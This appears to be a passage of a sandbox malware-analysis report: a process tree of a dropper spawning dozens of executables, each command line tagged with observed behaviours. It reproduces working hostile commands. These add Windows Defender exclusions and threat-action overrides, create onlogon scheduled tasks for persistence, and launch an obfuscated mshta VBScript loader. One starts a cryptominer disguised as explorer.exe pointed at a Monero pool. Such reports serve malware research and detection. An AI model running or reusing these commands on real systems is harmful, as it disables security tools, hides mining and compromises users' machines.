PID:5016 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1916
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05ac1b0207d3ff3b8.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4164 -
C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun05ac1b0207d3ff3b8.exeSun05ac1b0207d3ff3b8.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
PID:4420 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Sun05ac1b0207d3ff3b8.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun05ac1b0207d3ff3b8.exe" & del C:\ProgramData\*.dll & exit7⤵PID:6104
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Sun05ac1b0207d3ff3b8.exe /f8⤵
- Kills process with taskkill
PID:4224
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:6696
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05640630a6aa.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3348 -
C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun05640630a6aa.exeSun05640630a6aa.exe6⤵
- Executes dropped EXE
PID:3560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05532f7abc.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun05532f7abc.exeSun05532f7abc.exe6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun052bbd8bebd9.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun052bbd8bebd9.exeSun052bbd8bebd9.exe6⤵
- Executes dropped EXE
PID:1848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05d60bc3b96248e5.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun05d60bc3b96248e5.exeSun05d60bc3b96248e5.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:740 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵PID:5432
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
PID:5684
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun050462125c7d35.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun050462125c7d35.exeSun050462125c7d35.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4236 -
C:\ProgramData\4402665.exe"C:\ProgramData\4402665.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5084
-
-
C:\ProgramData\1860007.exe"C:\ProgramData\1860007.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:684 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
- Executes dropped EXE
PID:4444
-
-
-
C:\ProgramData\133519.exe"C:\ProgramData\133519.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1456
-
-
C:\ProgramData\3733924.exe"C:\ProgramData\3733924.exe"7⤵
- Executes dropped EXE
PID:1036
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun059375dac544fc4a.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun059375dac544fc4a.exeSun059375dac544fc4a.exe6⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
PID:4804 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"8⤵
- Executes dropped EXE
PID:5088 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:6128
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:2592
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3688 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit10⤵PID:6804
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'11⤵
- Creates scheduled task(s)
PID:3348
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"10⤵
- Executes dropped EXE
PID:7524
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth10⤵PID:8128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1352 -
C:\ProgramData\2967757.exe"C:\ProgramData\2967757.exe"9⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:3728
-
-
C:\ProgramData\3307456.exe"C:\ProgramData\3307456.exe"9⤵
- Executes dropped EXE
PID:3436
-
-
C:\ProgramData\6937945.exe"C:\ProgramData\6937945.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5208 -
C:\ProgramData\6937945.exe"C:\ProgramData\6937945.exe"10⤵
- Executes dropped EXE
PID:5792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 94810⤵
- Program crash
PID:5980
-
-
-
C:\ProgramData\1949358.exe"C:\ProgramData\1949358.exe"9⤵
- Executes dropped EXE
PID:5572 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\1949358.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If """"== """" for %l In ( ""C:\ProgramData\1949358.exe"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))10⤵PID:5780
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\1949358.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\1949358.exe") do taskkill -Im "%~nxl" /F11⤵PID:6088
-
C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exEC3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw912⤵PID:4728
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))13⤵PID:5492
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F14⤵PID:5512
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
- Loads dropped DLL
PID:4700
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY13⤵
- Loads dropped DLL
PID:5228
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "1949358.exe" /F12⤵
- Kills process with taskkill
PID:5360
-
-
-
-
-
C:\ProgramData\2880988.exe"C:\ProgramData\2880988.exe"9⤵
- Executes dropped EXE
PID:5648
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Executes dropped EXE
PID:1868 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 8089⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:4512
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 8369⤵
- Program crash
PID:2128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 8889⤵
- Executes dropped EXE
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 9609⤵
- Program crash
PID:5356
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 9369⤵
- Program crash
PID:5720
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 9649⤵
- Program crash
PID:6040
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 10289⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:2748
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"8⤵
- Executes dropped EXE
PID:2108
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:4488
-
C:\Users\Admin\AppData\Local\Temp\is-1I5FE.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-1I5FE.tmp\setup_2.tmp" /SL5="$10206,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2896
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"8⤵
- Executes dropped EXE
PID:5000 -
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a9⤵
- Executes dropped EXE
PID:4536
-
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4436
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"8⤵
- Executes dropped EXE
PID:4292
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3548 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3548 -s 19969⤵
- Program crash
PID:2384
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05fa3b4d2ae56e.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun05fa3b4d2ae56e.exeSun05fa3b4d2ae56e.exe /mixone6⤵
- Executes dropped EXE
PID:4452 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 6567⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 6727⤵
- Program crash
PID:3048
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 6847⤵
- Program crash
PID:4728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 6647⤵
- Program crash
PID:5484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 8887⤵
- Program crash
PID:5300
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 9527⤵
- Program crash
PID:5036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 11007⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:2972
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun054fe19a12cb3.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun054fe19a12cb3.exeSun054fe19a12cb3.exe6⤵
- Executes dropped EXE
PID:4404 -
C:\Users\Admin\AppData\Local\Temp\is-9FHVS.tmp\Sun054fe19a12cb3.tmp"C:\Users\Admin\AppData\Local\Temp\is-9FHVS.tmp\Sun054fe19a12cb3.tmp" /SL5="$7002E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun054fe19a12cb3.exe"7⤵
- Executes dropped EXE
PID:3872 -
C:\Users\Admin\AppData\Local\Temp\is-OE13U.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-OE13U.tmp\46807GHF____.exe" /S /UID=burnerch28⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:972 -
C:\Program Files\Windows Photo Viewer\JTSSYWMJLN\ultramediaburner.exe"C:\Program Files\Windows Photo Viewer\JTSSYWMJLN\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
PID:3684 -
C:\Users\Admin\AppData\Local\Temp\is-V13IT.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-V13IT.tmp\ultramediaburner.tmp" /SL5="$B01E6,281924,62464,C:\Program Files\Windows Photo Viewer\JTSSYWMJLN\ultramediaburner.exe" /VERYSILENT10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5476 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu11⤵
- Executes dropped EXE
PID:5268
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\b2-7d3dd-64a-999be-2f3cd1a32c459\Rulidakupy.exe"C:\Users\Admin\AppData\Local\Temp\b2-7d3dd-64a-999be-2f3cd1a32c459\Rulidakupy.exe"9⤵
- Executes dropped EXE
- Checks computer location settings
PID:5936
-
-
C:\Users\Admin\AppData\Local\Temp\6e-391bd-dc4-01581-805d012e0e5b0\Fokifyfulo.exe"C:\Users\Admin\AppData\Local\Temp\6e-391bd-dc4-01581-805d012e0e5b0\Fokifyfulo.exe"9⤵
- Executes dropped EXE
PID:4440 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wwmwizce.dfo\GcleanerEU.exe /eufive & exit10⤵PID:5948
-
C:\Users\Admin\AppData\Local\Temp\wwmwizce.dfo\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\wwmwizce.dfo\GcleanerEU.exe /eufive11⤵
- Executes dropped EXE
PID:6220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ry044sms.54o\installer.exe /qn CAMPAIGN="654" & exit10⤵PID:6256
-
C:\Users\Admin\AppData\Local\Temp\ry044sms.54o\installer.exeC:\Users\Admin\AppData\Local\Temp\ry044sms.54o\installer.exe /qn CAMPAIGN="654"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:6444 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ry044sms.54o\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ry044sms.54o\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631171482 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵PID:6580
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zv0i5cyr.o5a\anyname.exe & exit10⤵PID:6520
-
C:\Users\Admin\AppData\Local\Temp\zv0i5cyr.o5a\anyname.exeC:\Users\Admin\AppData\Local\Temp\zv0i5cyr.o5a\anyname.exe11⤵
- Executes dropped EXE
PID:6780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lzfvjj5x.xlv\BsInstFile.exe & exit10⤵PID:6728
-
C:\Users\Admin\AppData\Local\Temp\lzfvjj5x.xlv\BsInstFile.exeC:\Users\Admin\AppData\Local\Temp\lzfvjj5x.xlv\BsInstFile.exe11⤵
- Executes dropped EXE
PID:6852 -
C:\ProgramData\7310104.exe"C:\ProgramData\7310104.exe"12⤵PID:4172
-
-
C:\ProgramData\5077757.exe"C:\ProgramData\5077757.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: SetClipboardViewer
PID:3872
-
-
C:\ProgramData\8057540.exe"C:\ProgramData\8057540.exe"12⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6328
-
-
C:\ProgramData\3098340.exe"C:\ProgramData\3098340.exe"12⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6932
-
-
C:\ProgramData\4990988.exe"C:\ProgramData\4990988.exe"12⤵
- Executes dropped EXE
PID:2128 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\4990988.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If """"== """" for %l In ( ""C:\ProgramData\4990988.exe"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))13⤵PID:6996
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\4990988.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\4990988.exe") do taskkill -Im "%~nxl" /F14⤵PID:6740
-
C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exEC3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw915⤵
- Executes dropped EXE
PID:7452 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))16⤵PID:7620
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F17⤵PID:7836
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY16⤵
- Loads dropped DLL
PID:8176
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "4990988.exe" /F15⤵
- Kills process with taskkill
PID:7584
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vyu2bb22.b1j\askinstall52.exe & exit10⤵PID:6960
-
C:\Users\Admin\AppData\Local\Temp\vyu2bb22.b1j\askinstall52.exeC:\Users\Admin\AppData\Local\Temp\vyu2bb22.b1j\askinstall52.exe11⤵
- Executes dropped EXE
PID:7112 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe12⤵PID:6680
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe13⤵
- Kills process with taskkill
PID:2656
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mlocu5ln.kre\install.exe & exit10⤵PID:6980
-
C:\Users\Admin\AppData\Local\Temp\mlocu5ln.kre\install.exeC:\Users\Admin\AppData\Local\Temp\mlocu5ln.kre\install.exe11⤵
- Executes dropped EXE
PID:7040 -
C:\Users\Admin\AppData\Local\Temp\7zSDDA4.tmp\SimplInst.exe.\SimplInst.exe12⤵
- Executes dropped EXE
PID:6720 -
C:\Users\Admin\AppData\Local\Temp\7zSDEAD.tmp\SimplInst.exe.\SimplInst.exe /S /site_id "216660"13⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:7216 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &14⤵PID:7344
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"15⤵PID:7632
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:7784
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True17⤵PID:7948
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True18⤵PID:5032
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"15⤵PID:6632
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:7028
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True17⤵PID:7084
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True18⤵PID:7180
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"15⤵PID:4924
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:5524
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True17⤵PID:7108
-
